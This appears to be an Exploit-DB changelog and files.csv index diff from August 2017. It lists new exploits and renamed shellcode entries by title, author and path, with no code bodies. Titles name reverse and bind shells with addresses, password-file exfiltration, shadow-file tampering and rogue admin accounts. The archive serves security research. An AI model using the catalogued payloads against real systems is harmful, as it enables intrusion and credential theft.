DB: 2017-08-19

27 new exploits

Microsoft Edge Chakra - Uninitialized Arguments
Microsoft Edge Chakra - Uninitialized Arguments (1)
MyDoomScanner 1.00 - Local Buffer Overflow (PoC)
DSScan 1.0 - Local Buffer Overflow (PoC)
MessengerScan 1.05 - Local Buffer Overflow (PoC)
NoviFlow NoviWare <= NW400.2.6 - Multiple Vulnerabilities

Dive Assistant Template Builder 8.0 - XML External Entity Injection

Kolibri WebServer 2.0 - Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass
Kolibri WebServer 2.0 - Buffer Overflow (EMET 5.0 / EMET 4.1 Partial Bypass)

SpyCamLizard 1.230 - Buffer Overflow

Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)

BSD/x86 - setuid/portbind 31337/TCP Shellcode (94 bytes)
BSD/x86 - Bind Shell  31337/TCP + setuid(0) Shellcode (94 bytes)

BSD/x86 - Bind 31337/TCP Shellcode (83 bytes)
BSD/x86 - Bind Shell 31337/TCP Shellcode (83 bytes)

BSD/x86 - break chroot Shellcode (45 bytes)
BSD/x86 - Break chroot Shellcode (45 bytes)

BSD/x86 - connect torootteam.host.sk:2222 Shellcode (93 bytes)
BSD/x86 - Connect torootteam.host.sk:2222 Shellcode (93 bytes)

BSD/x86 - Reverse Portbind 6969/TCP Shellcode (129 bytes)
BSD/x86 - Reverse Shell 6969/TCP Shellcode (129 bytes)

FreeBSD/x86 - Reverse Portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)
FreeBSD/x86 - Reverse Shell 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)

(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)
(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)

Cisco IOS - Connectback Port 21 Shellcode
Cisco IOS - Connectback 21/TCP Shellcode

Linux/x86 - Reverse Telnet Shellcode (134 bytes)
Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)

Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)
ARM - Bind Shell Port 0x1337 Shellcode
ARM - Bind Connect 68/UDP Shellcode
ARM - Bind Shell 0x1337/TCP Shellcode
ARM - Bind Connect 68/UDP (Reverse Shell 192.168.0.1:67/UDP) Shellcode

OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)
OSX/Intel (x86-64) - Reverse TCP Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)

Windows - DNS Reverse Download and Exec Shellcode (Metasploit)
Windows - Reverse Download and Execute via DNS (IPv6) Shellcode (Metasploit)

Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) Shellcode (72 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)

Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)
Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)

Windows x86 - Reverse Persistent TCP Shellcode (494 Bytes)
Windows x86 - Reverse TCP Persistent Shell (192.168.232.129:4444/TCP) Shellcode (494 Bytes)

Linux/x86-64 - Reverse TCP Password Prompt Shellcode (151 bytes)
Linux/x86-64 - Reverse TCP Password Prompt Shell (127.0.0.1:4444) Shellcode (151 bytes)

Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)
Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)
Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes)
Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes)
Linux/x86-64 - Reverse TCP Password Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes)
Linux/x86-64 - Reverse TCP Password Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (2) (135 bytes)

Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)
Linux/x86 - Reverse TCP (IPv6) Shellcode (159 bytes)
Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)
Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)
Linux/x86-64 - Bind 1472/TCP (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)
Linux/x86 - Bind Shell Configurable Port Shellcode (87 bytes)
Linux/x86-64 - Reverse TCP Shell Null-Free Shellcode (134 bytes)
Linux/x86 - Bind Shell 1234/TCP (Configurable Port) Shellcode (87 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)

Linux/x86 - Reverse TCP Shellcode (75 bytes)
Linux/x86 - Reverse TCP Shell Shellcode (75 bytes)

Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes)

Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357) / Subtle Probing / Timer / Burst / Password / Multi-Terminal Shellcode (84/122/172 bytes)

Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)
Linux/x86 - Bind Netcat 98/TCP + UDP Shellcode (44/52 bytes)

Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)
Linux/x86 - Reverse TCP ZSH (127.255.255.254:9090/TCP) Shellcode (80 bytes)
Windows x86 - Reverse UDP Keylogger Shellcode (493 bytes)
Windows x64 - Reverse Shell TCP Shellcode (694 bytes)
Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)
Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) Shellcode (694 bytes)

Linux/x86-64 - Reverse TCP Shellcode (65 bytes)
Linux/x86-64 - Reverse TCP Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)
Linux/x86-64 - Reverse Shell Shellcode (84 bytes)
Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)
Linux/x86-64 - Reverse TCP Shell Shellcode (84 bytes)
Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)

Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)
Linux/x86-64 - Reverse Netcat (127.0.0.1:1337) Shellcode (72 bytes)

Linux/x86 - Reverse TCP Shellcode (67 bytes)
Linux/x86 - Reverse TCP Shell Shellcode (67 bytes)

Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)
Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) Shellcode (IPv6) (113 bytes)
Linux/x86_64 - execve(_/bin/sh_) Shellcode (24 bytes)
Linux/x86 - Reverse UDP Shellcode (668 bytes)
Linux/x86 - Bind Shell Shellcode (75 bytes)
Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)
Linux/x86-64 - execve(_/bin/sh_) Shellcode (24 bytes)
Linux/x86 - Reverse UDP Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind Shell 4444/TCP Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)

Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)

SOA School Management - SQL Injection
SOA School Management - 'view' Parameter SQL Injection

Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection
Food Ordering Script 1.0 - SQL Injection
LiveCRM 1.0 - SQL Injection
LiveSupport 1.0 - SQL Injection
LiveInvoices 1.0 - SQL Injection
LiveSales 1.0 - SQL Injection
LiveProjects 1.0 - SQL Injection
Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution
Joomla! Component Appointment 1.1 - SQL Injection
Joomla! Component Twitch Tv 1.1 - SQL Injection
Joomla! Component KissGallery 1.0.0 - SQL Injection
Matrimony Script 2.7 - SQL Injection
eCardMAX 10.5 - SQL Injection
SOA School Management 3.0 - SQL Injection
Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection
Joomla! Component Calendar Planner 1.0.1 - SQL Injection
Joomla! Component SP Movie Database 1.3 - SQL Injection
DeWorkshop 1.0 - Arbitrary File Upload
QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities

files.csv

@@ -5653,12 +5653,16 @@ id,file,description,date,author,platform,type,port
 42473,platforms/windows/dos/42473.html,"Microsoft Edge Chakra - Incorrect JIT Optimization with TypedArray Setter #2",2017-08-17,"Google Security Research",windows,dos,0
 42474,platforms/windows/dos/42474.html,"Microsoft Edge Chakra - 'JavascriptArray::ConcatArgs' Type Confusion",2017-08-17,"Google Security Research",windows,dos,0
 42475,platforms/windows/dos/42475.html,"Microsoft Edge Chakra - 'JavascriptFunction::EntryCall' Fails to Handle 'CallInfo' Properly",2017-08-17,"Google Security Research",windows,dos,0
-42476,platforms/windows/dos/42476.html,"Microsoft Edge Chakra - Uninitialized Arguments",2017-08-17,"Google Security Research",windows,dos,0
+42476,platforms/windows/dos/42476.html,"Microsoft Edge Chakra - Uninitialized Arguments (1)",2017-08-17,"Google Security Research",windows,dos,0
 42477,platforms/windows/dos/42477.html,"Microsoft Edge Chakra - Uninitialized Arguments (2)",2017-08-17,"Google Security Research",windows,dos,0
 42478,platforms/windows/dos/42478.html,"Microsoft Edge Chakra - 'EmitNew' Integer Overflow",2017-08-17,"Google Security Research",windows,dos,0
 42479,platforms/windows/dos/42479.html,"Microsoft Edge 40.15063.0.0 Chakra - Incorrect JIT Optimization with TypedArray Setter #3",2017-08-17,"Google Security Research",windows,dos,0
 42480,platforms/windows/dos/42480.txt,"Adobe Flash - Invoke Accesses Trait Out-of-Bounds",2017-08-17,"Google Security Research",windows,dos,0
 42481,platforms/windows/dos/42481.js,"Microsoft Edge - Out-of-Bounds Access when Fetching Source",2017-08-17,"Google Security Research",windows,dos,0
+42483,platforms/windows/dos/42483.py,"MyDoomScanner 1.00 - Local Buffer Overflow (PoC)",2017-08-17,"Anurag Srivastava",windows,dos,0
+42486,platforms/windows/dos/42486.py,"DSScan 1.0 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
+42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
+42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare <= NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9153,6 +9157,7 @@ id,file,description,date,author,platform,type,port
 41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
 41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
 41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0
+42000,platforms/windows/local/42000.txt,"Dive Assistant Template Builder 8.0 - XML External Entity Injection",2017-05-12,"Trent Gordon",windows,local,0
 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
 42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
@@ -14900,7 +14905,7 @@ id,file,description,date,author,platform,type,port
 34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 - dot Character Remote File Disclosure",2009-10-09,Dr_IDE,windows,remote,0
 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0
 34853,platforms/windows/remote/34853.c,"PowerDVD 5.0.1107 - 'trigger.dll' DLL Loading Arbitrary Code Execution",2010-10-19,"Inj3cti0n P4ck3t",windows,remote,0
-34856,platforms/windows/remote/34856.py,"Kolibri WebServer 2.0 - Buffer Overflow with EMET 5.0 and EMET 4.1 Partial Bypass",2014-10-02,tekwizz123,windows,remote,80
+34856,platforms/windows/remote/34856.py,"Kolibri WebServer 2.0 - Buffer Overflow (EMET 5.0 / EMET 4.1 Partial Bypass)",2014-10-02,tekwizz123,windows,remote,80
 34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 - Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0
 34862,platforms/linux/remote/34862.rb,"Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)",2014-10-02,Metasploit,linux,remote,21
 34866,platforms/linux/remote/34866.rb,"HP Network Node Manager I - PMD Buffer Overflow (Metasploit)",2014-10-02,Metasploit,linux,remote,7426
@@ -15735,6 +15740,7 @@ id,file,description,date,author,platform,type,port
 42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0
 42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100
 42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0
+42222,platforms/windows/remote/42222.py,"SpyCamLizard 1.230 - Buffer Overflow",2017-06-20,abatchy17,windows,remote,0
 42251,platforms/python/remote/42251.rb,"Symantec Messaging Gateway 10.6.2-7 - Remote Code Execution (Metasploit)",2017-06-26,"Mehmet Ince",python,remote,443
 42257,platforms/cgi/remote/42257.rb,"Netgear DGN2200 - dnslookup.cgi Command Injection (Metasploit)",2017-06-26,Metasploit,cgi,remote,80
 42282,platforms/windows/remote/42282.rb,"Veritas/Symantec Backup Exec - SSL NDMP Connection Use-After-Free (Metasploit)",2017-06-29,Metasploit,windows,remote,10000
@@ -15755,22 +15761,23 @@ id,file,description,date,author,platform,type,port
 42369,platforms/cgi/remote/42369.rb,"IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)",2017-07-24,Metasploit,cgi,remote,0
 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0
 42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0
+42484,platforms/windows/remote/42484.html,"Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)",2017-08-18,"Hans Jerry Illikainen",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
 13243,platforms/bsd_ppc/shellcode/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0
 13244,platforms/bsd_x86/shellcode/13244.c,"BSD/x86 - setuid(0) then execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
-13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind 31337/TCP Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
+13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - Bind Shell  31337/TCP + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0
 13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0
 13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
-13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind 31337/TCP Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
+13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind Shell 31337/TCP Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0
 13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Bind Random Port Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0
-13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
+13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
 13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
 13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh ENCRYPT* Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
-13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - connect torootteam.host.sk:2222 Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
+13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - Connect torootteam.host.sk:2222 Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0
 13255,platforms/bsd_x86/shellcode/13255.c,"BSD/x86 - cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0
-13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - Reverse Portbind 6969/TCP Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
+13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - Reverse Shell 6969/TCP Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0
 13257,platforms/bsdi_x86/shellcode/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0
 13258,platforms/bsdi_x86/shellcode/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0
 13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0
@@ -15780,7 +15787,7 @@ id,file,description,date,author,platform,type,port
 13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - kill all processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0
 13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - rev connect + recv + jmp + return results Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0
 13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0
-13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse Portbind 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
+13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse Shell 127.0.0.1:8000 /bin/sh Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - /bin/sh Encrypted Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0
 13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind 4883/TCP with Auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
@@ -15800,10 +15807,10 @@ id,file,description,date,author,platform,type,port
 13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0
 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0
 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0
-13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0
+13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,generator,shellcode,0
 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
-13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
+13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback 21/TCP Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Protected Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
@@ -15946,7 +15953,7 @@ id,file,description,date,author,platform,type,port
 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0
 13433,platforms/lin_x86/shellcode/13433.c,"Linux/x86 - iptables -F Shellcode (45 bytes)",2004-09-26,UnboundeD,lin_x86,shellcode,0
 13434,platforms/lin_x86/shellcode/13434.c,"Linux/x86 - iptables -F Shellcode (58 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0
-13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0
+13435,platforms/lin_x86/shellcode/13435.c,"Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)",2004-09-26,hts,lin_x86,shellcode,0
 13436,platforms/lin_x86/shellcode/13436.c,"Linux/x86 - connect Shellcode (120 bytes)",2004-09-26,lamagra,lin_x86,shellcode,0
 13437,platforms/lin_x86/shellcode/13437.c,"Linux/x86 - chmod 666 /etc/shadow Shellcode (41 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0
 13438,platforms/lin_x86/shellcode/13438.c,"Linux/x86 - cp /bin/sh /tmp/katy ; chmod 4555 katy Shellcode (126 bytes)",2004-09-26,RaiSe,lin_x86,shellcode,0
@@ -16034,7 +16041,7 @@ id,file,description,date,author,platform,type,port
 13521,platforms/win_x86/shellcode/13521.asm,"Win32 - WinExec() Command Parameter Shellcode (104+ bytes)",2006-01-24,Weiss,win_x86,shellcode,0
 13522,platforms/win_x86/shellcode/13522.c,"Win32 - Download + Exec Shellcode (226+ bytes)",2005-12-23,darkeagle,win_x86,shellcode,0
 13523,platforms/win_x86/shellcode/13523.c,"Windows NT/2000/XP (Russian) - Add User 'slim' Shellcode (318 bytes)",2005-10-28,darkeagle,win_x86,shellcode,0
-13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0
+13524,platforms/win_x86/shellcode/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",win_x86,shellcode,0
 13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0
 13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0
 13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0
@@ -16164,8 +16171,8 @@ id,file,description,date,author,platform,type,port
 15136,platforms/windows/shellcode/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",windows,shellcode,0
 15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
 15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0
-15314,platforms/arm/shellcode/15314.asm,"ARM - Bind Shell Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15314,platforms/arm/shellcode/15314.asm,"ARM - Bind Shell 0x1337/TCP Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect 68/UDP Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
+15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect 68/UDP (Reverse Shell 192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
@@ -16177,10 +16184,10 @@ id,file,description,date,author,platform,type,port
 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0
 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod(_/etc/shadow__ 0666) + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0
 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - Bind Shell Netcat 6666/TCP Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
-17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
+17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - Reverse TCP Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0
 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
-17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
